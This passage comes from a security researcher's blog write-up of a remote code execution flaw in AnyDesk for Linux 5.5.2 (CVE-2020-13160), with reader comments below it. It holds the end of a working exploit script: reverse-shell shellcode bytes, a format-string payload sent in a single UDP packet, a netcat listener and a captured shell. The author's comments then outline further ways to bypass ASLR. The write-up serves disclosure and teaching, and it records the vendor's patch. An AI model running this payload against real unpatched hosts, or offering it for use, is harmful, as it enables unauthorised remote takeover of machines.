shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x59\x88\xc6"
shellcode += b"\x9c\x5f\xfe\x71\x38\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x33\xa1\x9e\x05\x35"
shellcode += b"\xfc\x2e\x52\x58\xd6\xc9\x99\x17\x69\x39\x81"
shellcode += b"\x5b\x88\xd7\xc0\x20\xfe\x71\x39\x08\xc0\x4f"
shellcode += b"\x7a\x35\xee\x2b\x52\x73\xd0\xc9\x99\x35\xfd"
shellcode += b"\x2f\x70\xa6\x46\xac\xbd\x07\xf1\x74\x4d\xaf"
shellcode += b"\xe2\xfd\xc4\xc6\xb6\xca\x17\x3b\xe1\xa8\xb3"
shellcode += b"\x2c\x96\x71\x6b\x11\x01\x21\xce\x08\xb6\xf8"
shellcode += b"\xde\x56\x8d\xc6\x9c\x5f\xfe\x71\x38"

print('sending payload ...')
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')

Before running the exploit we start a nc listener on port 4444:

user@w00d:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)

Now we run the exploit script:

user@w00d:~$ ./final_exploit.py 
sending payload ...
reverse shell should connect within 5 seconds

After a few seconds the front-end updates its online states, which triggers the exploit. The shellcode is executed and we receive a reverse shell:

...
Connection from localhost 52000 received!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Conclusion

By sending a single UDP packet to the target machine we are able to successfully exploit the discovered format string vulnerability to gain Remote Code Execution. In order to achieve this we triggered the vulnerability twice: once to write the address of the GOT entry of the time function to the stack and a second time to write the heap address of our shellcode to the GOT entry using a dynamic field width.

Please keep in mind that this is a proof of concept exploit targeting AnyDesk Linux version 5.5.2. The exploit was developed for Ubuntu 18.04.4 LTS at the time of writing. In order to successfully run the exploit against other targets it probably needs to be adjusted.

At last I would like to thank AnyDesk for the immediate and professional reaction. A patch to fix the vulnerability was released only three days after my notification. Also the patch enabled FULL RELRO according to my suggestion. This remaps the GOT as read-only preventing an attacker from overwriting an entry within the GOT.

It is great to see when security is taken seriously.

Thanks for reading the article 🙂

Timeline
18/02/20 – Vendor Notification
19/02/20 – Vendor Acknowledgement
21/02/20 – Vendor Patch
09/06/20 – Public Disclosure

9 Replies to “AnyDesk UDP Discovery Remote Code Execution (CVE-2020-13160)”

  1. the most difficult part is search 2 stack that reliable for format string argument …
    but what if the heap doesnt mark with rwx instead the stack that got mark rwx ?

    1. Yes, in this case the stack varies when the format string vulnerability is triggered either by the username or by the hostname. You can increase the reliability by simply using values more down on the stack, as these values are more likely to stay the same between both calls.
      If the heap is not marked as rwx you cannot use the strategy described here. The main challenge was to defeat ASLR with a single shot (no leak). The dynamic field width is one way to do this, but it probably won’t be possible with the stack, since stack addresses exceed 4 bytes and the dynamic field width only uses 4 bytes. Another approach would be a partial overwrite (only overwriting the least significant bytes of a function pointer / return address leaving the upper bytes as influenced by ASLR) in order to set the instruction pointer to a controlled memory address marked as rwx. If this does not seem to be possible too, another strategy might be to actually leak an address e.g. by determining a way to transmit an address via an UDP broadcast. Also keep in mind that PIE is not enabled for the binary, which means that the addresses of the binary itself are not influenced by ASLR. Although a format string vulnerability is not as comfortable as a classical buffer overflow in order to store a ROP chain, it is possible. You could store the ROP chain at a known address (from the binary) by multiply leveraging the format string vulnerability and then finally overwrite an GOT entry with the address of an gadget setting the stack pointer to this specific address.

  2. What a nice piece of analysis. I’ve added this as a CTF target in one of my courses. The exploit seems rock solid on 18.04.4.

  3. it’s also stable on 18.04.6
    and it also works with kernel 4.15 which could be relevant if you need to host the box on e.g. AWS/EC².
    Then you’d need to start off with Ubuntu server 18.04.6 (kernel 4.15 as opposed to 5.4 with Ubuntu Desktop 18.04!) and then install the ubuntu-desktop packages.

Comments are closed.